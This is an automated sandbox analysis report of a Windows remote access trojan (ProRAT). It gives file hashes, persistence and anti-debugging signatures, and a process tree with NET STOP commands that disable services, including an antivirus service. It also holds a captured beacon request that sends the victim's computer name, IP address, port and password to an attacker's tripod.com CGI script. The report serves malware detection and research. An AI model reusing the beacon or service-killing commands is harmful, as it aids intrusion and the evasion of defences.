Analysis

  • max time kernel
    149s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/07/2024, 08:54 UTC

General

  • Target

    735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe

  • Size

    2.5MB

  • MD5

    735f2f3c0d78551946debbaae311ac44

  • SHA1

    0fbac06cea353237b488decd7fb172d8a4fdd1e6

  • SHA256

    79525c2360d5eb5b817a6ae852ab1daeb3de171f1fb04c3f67cc62b0cf78765e

  • SHA512

    556f89b7a61acf5226e5cc5845d146aff96d9f9e8ac8c6c7d53846c29d0679f24c5c0d4cf2e5bab70c2de3eb7472e43eec14953140bd8787a3a3f49bb1a84995

  • SSDEEP

    49152:Mr1rcdfkbfLxGETDBIpnsZffVzTSXTkurhjDm8tcGU:UhuMjFVTK6SXTZtmmcGU

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Adds policy Run key to start application 2 TTPs 4 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds policy Run key to start application
    • Boot or Logon Autostart Execution: Active Setup
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Modifies WinLogon
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\SysWOW64\fservice.exe
      C:\Windows\system32\fservice.exe
      2⤵
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\services.exe
        C:\Windows\services.exe -XP
        3⤵
        • Modifies WinLogon for persistence
        • Adds policy Run key to start application
        • Boot or Logon Autostart Execution: Active Setup
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Modifies WinLogon
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\SysWOW64\NET.exe
          NET STOP srservice
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 STOP srservice
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2928
        • C:\Windows\SysWOW64\NET.exe
          NET STOP navapsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1792
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 STOP navapsvc
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe.bat
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2248

Network

  • flag-us
    DNS
    totonkg.tripod.com
    services.exe
    Remote address:
    8.8.8.8:53
    Request
    totonkg.tripod.com
    IN A
    Response
    totonkg.tripod.com
    IN CNAME
    members.tripod.com
    members.tripod.com
    IN CNAME
    webpub-https-proxy.bo3.lycos.com
    webpub-https-proxy.bo3.lycos.com
    IN A
    209.202.252.105
  • flag-us
    GET
    http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
    services.exe
    Remote address:
    209.202.252.105:80
    Request
    GET http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: totonkg.tripod.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.18.0
    Date: Fri, 26 Jul 2024 09:05:14 GMT
    Content-Type: text/html
    Content-Length: 145
    Connection: keep-alive
    Location: https://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
  • 209.202.252.105:80
    http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
    http
    services.exe
    745 B
    1.3kB
    6
    5

    HTTP Request

    GET http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log

    HTTP Response

    302
  • 8.8.8.8:53
    totonkg.tripod.com
    dns
    services.exe
    64 B
    145 B
    1
    1

    DNS Request

    totonkg.tripod.com

    DNS Response

    209.202.252.105

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe.bat

    Filesize

    133B

    MD5

    4d4fb82ea4c84b3b5a20f5004d2058ed

    SHA1

    deac0a4009c1a69656a0681c2ddfa37b09d3c5ff

    SHA256

    257efb98c2a600a64d6c0ffcbfb20b3ebaa58e368e2bfe4b1df4818403aba44d

    SHA512

    e997e7eb615807dac7065049434d637c8000e3acde3d03fe9cec87104b125828c6afc472d77e48fe165c5bb949b6f5c734e8654c8124594da40af97fa191c5d2

  • \Windows\SysWOW64\fservice.exe

    Filesize

    2.5MB

    MD5

    735f2f3c0d78551946debbaae311ac44

    SHA1

    0fbac06cea353237b488decd7fb172d8a4fdd1e6

    SHA256

    79525c2360d5eb5b817a6ae852ab1daeb3de171f1fb04c3f67cc62b0cf78765e

    SHA512

    556f89b7a61acf5226e5cc5845d146aff96d9f9e8ac8c6c7d53846c29d0679f24c5c0d4cf2e5bab70c2de3eb7472e43eec14953140bd8787a3a3f49bb1a84995

  • \Windows\SysWOW64\reginv.dll

    Filesize

    36KB

    MD5

    d4a3f90e159ffbcbc4f9740de4b7f171

    SHA1

    0542f5d1e2c23dca8d90766b3a8537dc3880e5c9

    SHA256

    2200dd5f83d2fb8c5d3994206a4fa9ff34b4cbfe56ed39a9a03c954cf45d8f77

    SHA512

    5493beb50b5f7d8ec52f32718d01696916ae173456005d0c1294ce695161ce5004aff58ee3892bf5db0f9b23720146a6d3ae8ffbcbbd81f84d894fdc8cf75a94

  • \Windows\SysWOW64\winkey.dll

    Filesize

    24KB

    MD5

    43e7d9b875c921ba6be38d45540fb9dd

    SHA1

    f22a73fc0d4aa3ea6c0b8f61d974b028f308acc4

    SHA256

    f1b2b0abe844e6ba812c7f8709a463a7f6c56fa6ac38d376a0739cc3469f795b

    SHA512

    2e74e23c0875b69b82319391c392132f28f4eb45aa412805130382498ae48969a06a2b3a7528b626fa7d7ddb6b006f19f0ef8d73cf73cb9a0c0df44a21077622

  • memory/1288-67-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-66-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-76-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-75-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-74-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-73-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-31-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-72-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-71-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-35-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-36-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-37-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-70-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-41-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-55-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-53-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-68-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-65-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-69-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-60-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-61-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-62-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-63-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1288-64-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-15-0x0000000005F90000-0x00000000063A7000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-57-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-0-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-1-0x0000000000401000-0x0000000000461000-memory.dmp

    Filesize

    384KB

  • memory/1940-8-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-14-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/1940-16-0x0000000005F90000-0x00000000063A7000-memory.dmp

    Filesize

    4.1MB

  • memory/2072-54-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/2072-28-0x0000000005FA0000-0x00000000063B7000-memory.dmp

    Filesize

    4.1MB

  • memory/2072-30-0x0000000005FA0000-0x00000000063B7000-memory.dmp

    Filesize

    4.1MB

  • memory/2072-22-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

  • memory/2072-17-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB
